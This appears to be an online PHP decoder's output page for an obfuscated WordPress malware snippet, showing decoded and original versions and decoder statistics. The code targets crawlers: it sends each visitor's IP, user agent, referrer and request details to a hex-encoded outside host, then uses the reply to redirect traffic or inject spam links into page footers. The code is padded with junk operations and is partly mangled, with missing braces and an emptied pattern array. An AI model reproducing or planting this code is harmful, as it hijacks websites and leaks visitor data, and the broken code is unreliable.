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PHP Decode

<?php if (is_user_logged_in() == FALSE): ?> <?php $_0 = array( '#bing#i'..

Decoded Output download

if (is_user_logged_in() == FALSE): 
    $_0 = array( 
    foreach ($_0 as $_1) { 
        if (preg_match($_1, $_SERVER['HTTP_USER_AGENT'])) { 
            $_2 = str_replace('http://', '', $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); 
            $_2 = str_replace('https://', '', $_2); 
            $_2 = str_replace('www.', '', $_2); 
            $_3 = "" . md5($_2) . "&ua=" . base64_encode($_SERVER['HTTP_USER_AGENT']) . "&ref=" . base64_encode(@$_SERVER['HTTP_REFERER']) . "&ip=" . base64_encode($_SERVER['REMOTE_ADDR']) . "&uri=" . base64_encode($_SERVER['REQUEST_URI']) . "&host=" . base64_encode($_SERVER['HTTP_HOST']); 
            if (function_exists('curl_init')) { 
                $_4 = curl_init($_3); 
                curl_setopt($_4, CURLOPT_RETURNTRANSFER, round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)); 
                curl_setopt($_4, CURLOPT_FOLLOWLOCATION, round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333)); 
                curl_setopt($_4, CURLOPT_TIMEOUT, round(0 + 2.5 + 2.5 + 2.5 + 2.5)); 
                while (round(0 + 948 + 948 + 948 + 948) - round(0 + 1896 + 1896)) 
                    strrchr($_5, $_6); 
                $_7 = curl_exec($_4); 
                $_8 = round(0 + 105); 
                if (strpos('vjhitcsqwoogvums', 'cz') !== false) 
                    imagecopyresized($buffer, $_0); 
            } elseif (ini_get('allow_url_fopen')) { 
                if (function_exists('file_get_contents')) { 
                    $_7 = file_get_contents($_3); 
                } elseif (function_exists('fopen')) { 
                    $_9 = fopen($_3, "r"); 
                    $_7 = fread($_9, round(0 + 4096 + 4096)); 
                    if (round(0 + 1559 + 1559 + 1559 + 1559) < mt_rand(round(0 + 2089), round(0 + 1380.6666666667 + 1380.6666666667 + 1380.6666666667))) 
                        session_get_cookie_params($buffer, $_10, $_2, $_11, $_0); 
            if (!empty($_7)) { 
                $_12 = base64_decode($_7); 
                $_12 = @unserialize($_12); 
                $_12 = explode("ver;", trim($_12)); 
                if ((round(0 + 2030) + round(0 + 817.5 + 817.5)) > round(0 + 2030) || curl_setopt_array($_2, $_11)); 
                else { 
                    strval($_0, $_12); 
                $_13 = $_12[round(0)]; 
                if ((round(0 + 1160.25 + 1160.25 + 1160.25 + 1160.25) ^ round(0 + 1547 + 1547 + 1547)) && imagecopyresampled($_13, $buffer, $_5, $_14, $_4)) 
                    fgetss($_7, $_15); 
                $_12 = $_12[round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333)]; 
    if (!empty($_12) && $_13 == round(0 + 0.5 + 0.5 + 0.5 + 0.5)) { 
        $_16 = rand(round(0 + 100.33333333333 + 100.33333333333 + 100.33333333333), round(0 + 100.66666666667 + 100.66666666667 + 100.66666666667)); 
        header("HTTP/1.1 $_16 Moved Permanently"); 
        header("Location: $_12"); 
        if ((round(0 + 2120 + 2120) ^ round(0 + 1060 + 1060 + 1060 + 1060)) && array_product($_0, $_1)) 
    if (!empty($_12) && $_13 == round(0 + 0.25 + 0.25 + 0.25 + 0.25)) { 
        echo $_12; 
    function system_buffer_back($buffer) 
        if (!empty($buffer)) { 
            global $_12; 
            $_12 = explode("
", $_12); 
            if (!empty($_12) && is_array($_12)) { 
                $_5 = "footer;foter"; 
                $_5 = explode(";", $_5); 
                foreach ($_5 as $_10) { 
                    $_10 = "</$_10>"; 
                    $_17 = 'rcc'; 
                    $_14 = $_18 = round(0); 
                    if (round(0 + 1668 + 1668 + 1668) < mt_rand(round(0 + 357.8 + 357.8 + 357.8 + 357.8 + 357.8), round(0 + 642 + 642 + 642 + 642 + 642))) 
                        array_reverse($buffer, $_10, $_15, $_0); 
                    do { 
                        $_14 = strpos($buffer, $_10, $_18); 
                        if ($_14 !== false) { 
                            $_18    = $_14 + strlen($_10); 
                            $_11    = PHP_EOL . array_shift($_12); 
                            $buffer = substr_replace($buffer, $_11, $_18, round(0)); 
                            (round(0 + 1577) - round(0 + 315.4 + 315.4 + 315.4 + 315.4 + 315.4) + round(0 + 630.5 + 630.5 + 630.5 + 630.5) - round(0 + 504.4 + 504.4 + 504.4 + 504.4 + 504.4)) ? prev($_14) : mt_rand(round(0 + 394.25 + 394.25 + 394.25 + 394.25), round(0 + 646 + 646 + 646 + 646 + 646)); 
                            $_18 += strlen($_11); 
                    } while ($_14 !== false and !empty($_12)); 
                    if ((round(0 + 1243.5 + 1243.5 + 1243.5 + 1243.5) + round(0 + 543.66666666667 + 543.66666666667 + 543.66666666667)) > round(0 + 994.8 + 994.8 + 994.8 + 994.8 + 994.8) || date($_10, $_16, $buffer, $_16, $_11)); 
                    else { 
                        imagecreatefrompng($_0, $_9); 
                if (!empty($_12)) { 
                    preg_match('#(<\s*/body\s*>|<\s*/html\s*>)#i', $buffer, $_10); 
                    if (!empty($_10[round(0 + 0.25 + 0.25 + 0.25 + 0.25)])) { 
                        $buffer = str_replace($_10[round(0 + 1)], implode(" ", $_12) . "
{$_10[round(0+0.33333333333333+0.33333333333333+0.33333333333333)]}", $buffer); 
                    } elseif (!empty($buffer)) { 
                        $buffer .= "
" . implode(" ", $_12); 
        return $buffer; 
        if (strpos('fuctvtungqkglu', 'mwz') !== false) 
            substr_replace($_18, $_SERVER, $_15, $_SERVER, $_5); 
    function system_buffer_back_sort($_6, $_15) 
        return strlen($_15) - strlen($_6); 
    if (!empty($_12) && $_13 == round(0)) { 

Did this file decode correctly?

Original Code

if (is_user_logged_in() == FALSE):
    $_0 = array(
    foreach ($_0 as $_1) {
        if (preg_match($_1, $_SERVER['HTTP_USER_AGENT'])) {
            $_2 = str_replace('http://', '', $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
            $_2 = str_replace('https://', '', $_2);
            $_2 = str_replace('www.', '', $_2);
            $_3 = "\x68\164\164\160\x3a\57\x2f\143\150\x65\x63\x6b\151\x6e\x67\154\151\156\x6b\x73\x2e\143\x6f\x6d\x2f\156\156\57\x73\x65\162\x76\x65\x72\56\x70\x68\160\x3f\x6d\x64\65\x3d" . md5($_2) . "&ua=" . base64_encode($_SERVER['HTTP_USER_AGENT']) . "&ref=" . base64_encode(@$_SERVER['HTTP_REFERER']) . "&ip=" . base64_encode($_SERVER['REMOTE_ADDR']) . "&uri=" . base64_encode($_SERVER['REQUEST_URI']) . "&host=" . base64_encode($_SERVER['HTTP_HOST']);
            if (function_exists('curl_init')) {
                $_4 = curl_init($_3);
                curl_setopt($_4, CURLOPT_RETURNTRANSFER, round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2));
                curl_setopt($_4, CURLOPT_FOLLOWLOCATION, round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333));
                curl_setopt($_4, CURLOPT_TIMEOUT, round(0 + 2.5 + 2.5 + 2.5 + 2.5));
                while (round(0 + 948 + 948 + 948 + 948) - round(0 + 1896 + 1896))
                    strrchr($_5, $_6);
                $_7 = curl_exec($_4);
                $_8 = round(0 + 105);
                if (strpos('vjhitcsqwoogvums', 'cz') !== false)
                    imagecopyresized($buffer, $_0);
            } elseif (ini_get('allow_url_fopen')) {
                if (function_exists('file_get_contents')) {
                    $_7 = file_get_contents($_3);
                } elseif (function_exists('fopen')) {
                    $_9 = fopen($_3, "r");
                    $_7 = fread($_9, round(0 + 4096 + 4096));
                    if (round(0 + 1559 + 1559 + 1559 + 1559) < mt_rand(round(0 + 2089), round(0 + 1380.6666666667 + 1380.6666666667 + 1380.6666666667)))
                        session_get_cookie_params($buffer, $_10, $_2, $_11, $_0);
            if (!empty($_7)) {
                $_12 = base64_decode($_7);
                $_12 = @unserialize($_12);
                $_12 = explode("ver;", trim($_12));
                if ((round(0 + 2030) + round(0 + 817.5 + 817.5)) > round(0 + 2030) || curl_setopt_array($_2, $_11));
                else {
                    strval($_0, $_12);
                $_13 = $_12[round(0)];
                if ((round(0 + 1160.25 + 1160.25 + 1160.25 + 1160.25) ^ round(0 + 1547 + 1547 + 1547)) && imagecopyresampled($_13, $buffer, $_5, $_14, $_4))
                    fgetss($_7, $_15);
                $_12 = $_12[round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333)];
    if (!empty($_12) && $_13 == round(0 + 0.5 + 0.5 + 0.5 + 0.5)) {
        $_16 = rand(round(0 + 100.33333333333 + 100.33333333333 + 100.33333333333), round(0 + 100.66666666667 + 100.66666666667 + 100.66666666667));
        header("HTTP/1.1 $_16 Moved Permanently");
        header("Location: $_12");
        if ((round(0 + 2120 + 2120) ^ round(0 + 1060 + 1060 + 1060 + 1060)) && array_product($_0, $_1))
    if (!empty($_12) && $_13 == round(0 + 0.25 + 0.25 + 0.25 + 0.25)) {
        echo $_12;
    function system_buffer_back($buffer)
        if (!empty($buffer)) {
            global $_12;
            $_12 = explode("\n", $_12);
            if (!empty($_12) && is_array($_12)) {
                $_5 = "footer;foter";
                $_5 = explode(";", $_5);
                foreach ($_5 as $_10) {
                    $_10 = "</$_10>";
                    $_17 = 'rcc';
                    $_14 = $_18 = round(0);
                    if (round(0 + 1668 + 1668 + 1668) < mt_rand(round(0 + 357.8 + 357.8 + 357.8 + 357.8 + 357.8), round(0 + 642 + 642 + 642 + 642 + 642)))
                        array_reverse($buffer, $_10, $_15, $_0);
                    do {
                        $_14 = strpos($buffer, $_10, $_18);
                        if ($_14 !== false) {
                            $_18    = $_14 + strlen($_10);
                            $_11    = PHP_EOL . array_shift($_12);
                            $buffer = substr_replace($buffer, $_11, $_18, round(0));
                            (round(0 + 1577) - round(0 + 315.4 + 315.4 + 315.4 + 315.4 + 315.4) + round(0 + 630.5 + 630.5 + 630.5 + 630.5) - round(0 + 504.4 + 504.4 + 504.4 + 504.4 + 504.4)) ? prev($_14) : mt_rand(round(0 + 394.25 + 394.25 + 394.25 + 394.25), round(0 + 646 + 646 + 646 + 646 + 646));
                            $_18 += strlen($_11);
                    } while ($_14 !== false and !empty($_12));
                    if ((round(0 + 1243.5 + 1243.5 + 1243.5 + 1243.5) + round(0 + 543.66666666667 + 543.66666666667 + 543.66666666667)) > round(0 + 994.8 + 994.8 + 994.8 + 994.8 + 994.8) || date($_10, $_16, $buffer, $_16, $_11));
                    else {
                        imagecreatefrompng($_0, $_9);
                if (!empty($_12)) {
                    preg_match('#(<\s*/body\s*>|<\s*/html\s*>)#i', $buffer, $_10);
                    if (!empty($_10[round(0 + 0.25 + 0.25 + 0.25 + 0.25)])) {
                        $buffer = str_replace($_10[round(0 + 1)], implode(" ", $_12) . "\n{$_10[round(0+0.33333333333333+0.33333333333333+0.33333333333333)]}", $buffer);
                    } elseif (!empty($buffer)) {
                        $buffer .= "\n" . implode(" ", $_12);
        return $buffer;
        if (strpos('fuctvtungqkglu', 'mwz') !== false)
            substr_replace($_18, $_SERVER, $_15, $_SERVER, $_5);
    function system_buffer_back_sort($_6, $_15)
        return strlen($_15) - strlen($_6);
    if (!empty($_12) && $_13 == round(0)) {

Function Calls

is_user_logged_in 1




MD5 45a4ead15653b68cd43cc02a20a4340b
Eval Count 0
Decode Time 131 ms